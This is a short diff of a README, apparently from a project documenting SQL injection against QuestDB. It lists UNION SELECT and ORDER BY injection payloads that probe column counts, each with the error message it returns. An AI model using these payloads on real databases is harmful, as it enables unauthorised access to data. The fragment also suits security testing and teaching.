meisamrce/QuestDB-Injection/README.md

         1' order by 100--                             #order column position is out of range [max=8] 1' order by 8--                               #no error
-        1' union SELECT 1--                           #queries have different number of columns 1' union SELECT 1--                           #queries have different number of columns 1' union SELECT 1,2,3,4,5,6,7,8--             #error queries have different number of columns 1' union SELECT 1,2,3,4,5,6,7,8--             #error unsupported cast [column=8, from=INT, to=TIMESTAMP]
+        1' union SELECT 1--                           #queries have different number of columns 1' union SELECT 1,2,3,4,5,6,7,8--             #error queries have different number of columns 1' union SELECT 1,2,3,4,5,6,7,8--             #error unsupported cast [column=8, from=INT, to=TIMESTAMP]